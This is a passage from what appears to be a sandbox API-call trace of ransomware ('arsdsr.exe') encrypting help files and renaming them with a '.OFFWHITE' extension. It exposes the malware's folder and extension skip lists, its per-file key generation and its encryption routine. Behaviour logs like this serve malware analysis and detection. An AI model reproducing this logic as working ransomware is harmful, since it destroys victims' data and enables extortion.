Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.477] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=326) returned 1 [0147.477] GetProcessHeap () returned 0x500000 [0147.477] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.477] GetProcessHeap () returned 0x500000 [0147.477] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.477] GetProcessHeap () returned 0x500000 [0147.477] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.478] GetProcessHeap () returned 0x500000 [0147.478] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.478] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.478] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.478] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.478] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.478] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.478] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.478] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.478] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.478] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.478] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.478] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.478] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.478] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x146, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.478] SetLastError (dwErrCode=0x0) [0147.478] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.480] GetLastError () returned 0x0 [0147.480] GetLastError () returned 0x0 [0147.480] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x246, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.480] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.480] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x346, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.480] WriteFile (in: hFile=0xb0, lpBuffer=0x526c18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c18*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.480] GetProcessHeap () returned 0x500000 [0147.480] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x146) returned 0x51d650 [0147.480] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.480] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x146, lpOverlapped=0x0) returned 1 [0147.480] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.480] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x146, lpOverlapped=0x0) returned 1 [0147.480] GetProcessHeap () returned 0x500000 [0147.480] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.480] CloseHandle (hObject=0xb0) returned 1 [0147.481] GetProcessHeap () returned 0x500000 [0147.481] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.481] GetProcessHeap () returned 0x500000 [0147.481] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.481] GetProcessHeap () returned 0x500000 [0147.481] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.481] GetProcessHeap () returned 0x500000 [0147.481] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.481] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" [0147.481] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.OFFWHITE" [0147.481] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.offwhite")) returned 1 [0147.481] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.MSPUB.DEV.14.1033.hxn", cAlternateFileName="MSMSPU~2.HXN")) returned 1 [0147.481] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2=".") returned 1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="..") returned 1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="...") returned 1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="windows") returned -1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="rsa") returned -1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="programdata") returned -1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="appdata") returned 1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="program files") returned -1 [0147.482] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.482] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.482] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.MSPUB.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" [0147.482] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.482] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.482] PathFindExtensionW (pszPath="MS.MSPUB.DEV.14.1033.hxn") returned=".hxn" [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.482] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.483] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.483] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.483] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.483] GetProcessHeap () returned 0x500000 [0147.483] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c28 [0147.483] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.483] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=350) returned 1 [0147.483] GetProcessHeap () returned 0x500000 [0147.483] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.483] GetProcessHeap () returned 0x500000 [0147.483] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.483] GetProcessHeap () returned 0x500000 [0147.483] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.483] GetProcessHeap () returned 0x500000 [0147.483] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.483] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.484] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.484] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.484] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.484] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.484] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.484] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.484] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.484] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.484] SetLastError (dwErrCode=0x0) [0147.484] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.487] GetLastError () returned 0x0 [0147.487] GetLastError () returned 0x0 [0147.487] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x25e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.487] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.487] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x35e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.487] WriteFile (in: hFile=0xb0, lpBuffer=0x526c28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c28*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.487] GetProcessHeap () returned 0x500000 [0147.487] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15e) returned 0x52ebe8 [0147.487] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.487] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x15e, lpOverlapped=0x0) returned 1 [0147.488] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.488] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x15e, lpOverlapped=0x0) returned 1 [0147.488] GetProcessHeap () returned 0x500000 [0147.488] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.488] CloseHandle (hObject=0xb0) returned 1 [0147.488] GetProcessHeap () returned 0x500000 [0147.488] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.488] GetProcessHeap () returned 0x500000 [0147.488] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.488] GetProcessHeap () returned 0x500000 [0147.488] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.488] GetProcessHeap () returned 0x500000 [0147.488] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.488] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" [0147.488] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.OFFWHITE" [0147.488] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn.offwhite")) returned 1 [0147.489] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.MSTORE.14.1033.hxn", cAlternateFileName="MSMSTO~1.HXN")) returned 1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2=".") returned 1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="..") returned 1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="...") returned 1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="windows") returned -1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="rsa") returned -1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="programdata") returned -1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="appdata") returned 1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="program files") returned -1 [0147.489] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.489] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.489] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.MSTORE.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" [0147.489] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.489] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.490] PathFindExtensionW (pszPath="MS.MSTORE.14.1033.hxn") returned=".hxn" [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.490] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.490] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.490] GetProcessHeap () returned 0x500000 [0147.490] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c38 [0147.490] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.491] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=332) returned 1 [0147.491] GetProcessHeap () returned 0x500000 [0147.491] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.491] GetProcessHeap () returned 0x500000 [0147.491] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.491] GetProcessHeap () returned 0x500000 [0147.491] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.491] GetProcessHeap () returned 0x500000 [0147.491] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.491] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.491] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.491] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.491] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.491] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.491] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.491] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.491] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.492] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.492] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.492] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.492] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.492] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x14c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.492] SetLastError (dwErrCode=0x0) [0147.492] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.495] GetLastError () returned 0x0 [0147.495] GetLastError () returned 0x0 [0147.495] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x24c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.495] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.495] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x34c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.495] WriteFile (in: hFile=0xb0, lpBuffer=0x526c38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c38*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.495] GetProcessHeap () returned 0x500000 [0147.495] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14c) returned 0x51d650 [0147.495] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.495] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x14c, lpOverlapped=0x0) returned 1 [0147.495] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.495] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x14c, lpOverlapped=0x0) returned 1 [0147.495] GetProcessHeap () returned 0x500000 [0147.495] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.496] CloseHandle (hObject=0xb0) returned 1 [0147.496] GetProcessHeap () returned 0x500000 [0147.496] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.496] GetProcessHeap () returned 0x500000 [0147.496] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.496] GetProcessHeap () returned 0x500000 [0147.496] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.496] GetProcessHeap () returned 0x500000 [0147.496] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.496] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" [0147.496] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft 